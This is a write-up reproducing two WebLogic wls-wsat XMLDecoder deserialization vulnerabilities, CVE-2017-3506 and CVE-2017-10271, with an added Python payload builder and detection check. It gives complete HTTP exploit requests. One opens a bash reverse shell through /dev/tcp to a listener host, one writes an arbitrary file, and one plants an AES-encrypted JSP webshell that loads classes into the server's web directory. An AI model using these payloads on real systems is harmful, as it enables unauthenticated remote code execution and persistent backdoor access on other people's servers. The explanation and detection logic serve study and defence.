Weblogic vulnerability reproduction

Article directory

  • Weblogic vulnerability reproduction
    • WebLogic XMLDecoder Deserialization Vulnerability (CVE-2017-3506)
      • Principle
      • Affected versions
      • Reproduction
    • Weblogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability (CVE-2017-10271)
      • Principle
      • Affected versions
      • Reproduction

WebLogic XMLDecoder deserialization vulnerability (CVE-2017-3506)

Principle

The wls-wsat component of WebLogic parses the WorkContext SOAP header with java.beans.XMLDecoder, which instantiates whatever Java classes the XML names and calls the methods it specifies. A crafted XML document POSTed to a wls-wsat endpoint therefore gives unauthenticated remote code execution. The issue was disclosed publicly and assigned CVE-2017-3506.

Affected versions

10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0.

Reproduction

Potentially vulnerable paths (all are wls-wsat endpoints that parse the WorkContext header):
/wls-wsat/CoordinatorPortType, /wls-wsat/RegistrationPortTypeRPC,
/wls-wsat/ParticipantPortType, /wls-wsat/RegistrationRequesterPortType,
/wls-wsat/CoordinatorPortType11, /wls-wsat/RegistrationPortTypeRPC11,
/wls-wsat/ParticipantPortType11, /wls-wsat/RegistrationRequesterPortType11

Visit http://192.168.190.136:7001/wls-wsat/RegistrationRequesterPortType. A response page titled Web Services shows that the wls-wsat component is deployed and reachable, which is the precondition for this vulnerability; whether it is actually exploitable depends on the version and patch level listed above.

Send the reverse-shell payload:

POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: 192.168.190.136:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 841

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i &gt;&amp; /dev/tcp/192.168.190.1/4444 0&gt;&amp;1</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

nc listening on 192.168.190.1 port 4444 receives the bash shell.

Weblogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability (CVE-2017-10271)

Principle

CVE-2017-10271 is a bypass of the patch for CVE-2017-3506. That patch added a check to the WorkContext XML parser that rejects input containing an <object> element. XMLDecoder will, however, also instantiate a class from <void class="...">, so replacing <object> with <void> slips past the blacklist and gives the same code execution on servers patched only for CVE-2017-3506.
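To make the object-versus-void point concrete, here is an added Python example (not code from the original article or from Oracle) that builds both payload shapes offline and runs two simplified checks over them: one that approximates the CVE-2017-3506 fix by rejecting any <object> element, and one that flags any class-instantiating or method-invoking element the way the later fix does. The listener address, file path and content are made-up sample values, and the two check functions are approximations of WebLogic's validation, not its actual code. It also shows that XML-escaping the command keeps shell redirections such as >& intact.

```python
"""Offline builder and inspector for wls-wsat XMLDecoder payloads.

Added example, not from the original article. Nothing here touches a
server; the payloads are built as strings and parsed back locally.
The checks approximate WebLogic's fixes and are not its real code.
"""
from typing import List
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"


def wrap_in_workcontext(java_body: str) -> str:
    """Place an XMLDecoder document in the SOAP WorkContext header that wls-wsat parses."""
    return (
        f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Header>'
        f'<work:WorkContext xmlns:work="{WORK_NS}">'
        f'<java version="1.6.0" class="java.beans.XMLDecoder">{java_body}</java>'
        "</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"
    )


def processbuilder_payload(argv: List[str]) -> str:
    """CVE-2017-3506 shape: <object class="java.lang.ProcessBuilder"> ... <void method="start"/>.

    Each argv element is XML-escaped so characters like '>' and '&' survive
    instead of breaking the document.
    """
    items = "".join(
        f'<void index="{i}"><string>{escape(arg)}</string></void>'
        for i, arg in enumerate(argv)
    )
    return wrap_in_workcontext(
        '<object class="java.lang.ProcessBuilder">'
        f'<array class="java.lang.String" length="{len(argv)}">{items}</array>'
        '<void method="start"/></object>'
    )


def printwriter_payload(path: str, content: str) -> str:
    """CVE-2017-10271 shape: <void class="java.io.PrintWriter"> in place of <object>."""
    return wrap_in_workcontext(
        f'<void class="java.io.PrintWriter"><string>{escape(path)}</string>'
        f'<void method="println"><string>{escape(content)}</string></void>'
        '<void method="close"/></void>'
    )


def _workcontext_elements(body: str) -> list:
    """All elements under the WorkContext header, or [] if the header is absent."""
    root = ET.fromstring(body)
    wc = root.find(f".//{{{WORK_NS}}}WorkContext")
    return list(wc.iter()) if wc is not None else []


def object_blacklist_rejects(body: str) -> bool:
    """Approximation of the CVE-2017-3506 patch: reject only if an <object> element is present."""
    return any(el.tag == "object" for el in _workcontext_elements(body))


def xmldecoder_gadget_detected(body: str) -> bool:
    """Broader check in the spirit of the CVE-2017-10271 fix.

    Any element that names a class to instantiate (object/void/new with class=...)
    or invokes a method is treated as hostile; a legitimate WorkContext never
    carries an XMLDecoder <java> document at all.
    """
    for el in _workcontext_elements(body):
        if el.tag in ("object", "void", "new") and "class" in el.attrib:
            return True
        if el.tag in ("object", "void") and "method" in el.attrib:
            return True
    return False


def decoded_strings(body: str) -> List[str]:
    """The <string> values as XMLDecoder would see them, to verify escaping round-trips."""
    return [el.text or "" for el in _workcontext_elements(body) if el.tag == "string"]


if __name__ == "__main__":
    # Sample listener address and path are made up for the demonstration.
    cmd = ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"]
    p3506 = processbuilder_payload(cmd)
    p10271 = printwriter_payload("servers/AdminServer/tmp/test.txt", "xmldecoder_test")
    print("object blacklist stops 3506 payload :", object_blacklist_rejects(p3506))
    print("object blacklist stops 10271 payload:", object_blacklist_rejects(p10271))
    print("class-based check stops both        :",
          xmldecoder_gadget_detected(p3506), xmldecoder_gadget_detected(p10271))
    print("command round-trips through XML     :", decoded_strings(p3506)[2] == cmd[2])
```

Run it directly to see the blacklist pass the <void> variant while the class-based check catches both; the same class-based logic is what a WAF or IDS rule for wls-wsat traffic should key on rather than the literal string "object".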

Affected versions

10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0.

Reproduction

Visit http://192.168.0.131:7001/wls-wsat/CoordinatorPortType. A response page titled Web Services shows that the wls-wsat component is deployed and reachable, which is the precondition for this vulnerability; the version and patch level determine whether it is actually exploitable.

Sending crafted XML via POST allows arbitrary command execution. As a first, low-impact test, write a file to disk.
Request packet:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.0.131:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 705

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.6.0" class="java.beans.XMLDecoder">
        <void class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string>
          <void method="println">
            <string>xmldecoder_vul_test11</string>
          </void>
          <void method="close"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

The server returns HTTP 500. That is expected and does not indicate failure: XMLDecoder has already executed the PrintWriter constructor, println and close by the time the decoded result fails WorkContext processing, so the file is written. Because the target path is inside the exploded wls-wsat web application directory, the written file is served by that application. Note that the 54p17w directory name is specific to the deployed wls-wsat.war and should be confirmed rather than assumed on other installations.

Write a JSP webshell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.190.131:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 1154

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/zy.jsp</string>
          <void method="println"><string>
<![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="b8a7336f1f7528e1";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(), "AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())) ).newInstance().equals(pageContext);}%>
]]>
          </string></void>
          <void method="close"/>
        </void>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
